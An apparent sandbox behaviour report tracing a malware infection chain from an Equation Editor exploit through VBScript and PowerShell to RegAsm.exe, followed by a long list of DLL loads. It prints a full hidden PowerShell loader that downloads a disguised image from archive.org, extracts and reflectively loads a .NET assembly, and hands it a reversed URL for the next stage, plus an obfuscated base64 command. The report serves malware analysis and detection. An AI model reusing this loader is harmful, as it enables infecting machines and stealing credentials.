                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
